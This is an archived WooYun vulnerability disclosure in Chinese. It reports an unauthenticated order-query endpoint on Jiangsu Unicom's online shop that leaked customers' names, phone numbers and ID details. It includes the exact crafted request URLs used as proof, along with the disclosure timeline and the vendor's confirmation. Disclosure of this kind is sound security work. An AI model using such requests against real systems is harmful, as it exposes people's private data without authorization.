[公开漏洞]江苏联通商城存在未授权访问02（泄漏手机号、姓名、证件等信息）

江苏联通商城存在未授权访问02（泄漏手机号、姓名、证件等信息） 相关厂商： 江苏联通 漏洞作者：ty4z2008 提交时间：2014-04-24 14:19 公开时间：2014-06-08 14:20 漏洞类型：重要敏感信息泄露 危害等级：低 自评Rank：5 漏洞状态： 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源：http://www.wooyun.org Tags标签： 敏感信息泄露 漏洞详情 披露状态：

2014-04-24：细节已通知厂商并且等待厂商处理中
2014-04-29：厂商已经确认，细节仅向厂商公开
2014-05-09：细节向核心白帽子及相关领域专家公开
2014-05-19：细节向普通白帽子公开
2014-05-29：细节向实习白帽子公开
2014-06-08：细节向公众公开

简要描述：

江苏联通商城存在未授权访问泄漏用户信息

详细说明：

事发WooYun-2014-53145：http://wooyun.org/bugs/wooyun-2014-053145

然后尝试去官方访问看看是否已经修复成功。http://www.js.chinaunicom.com/shop/template/shop/order_query.shtml

查询发现漏洞似乎已经修复了。但通过抓包发现直接访问查询连接接口：http://www.js.chinaunicom.com/shop/shop/order/ShopOrderQuery.do

返回错误信息：

{"sale_type":"","login_error_msg":"销售渠道必须传入{sale_type：0-直销、1-分销、2-商城}!","is_login_succ":"0"}

手动构造可直接访问。具体见漏洞证明部分

漏洞证明：

证明1:http://www.js.chinaunicom.com/shop/shop/order/ShopOrderQuery.do?oper_flag=order_list&sale_type=2

证明2：http://www.js.chinaunicom.com/shop/shop/order/ShopOrderQuery.do?oper_flag=order_list&sale_type=1

修复方案：

加入验证机制

版权声明：转载请注明来源 ty4z2008@乌云 漏洞回应 厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-04-29 09:07

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给江苏分中心处置。

最新状态：

暂无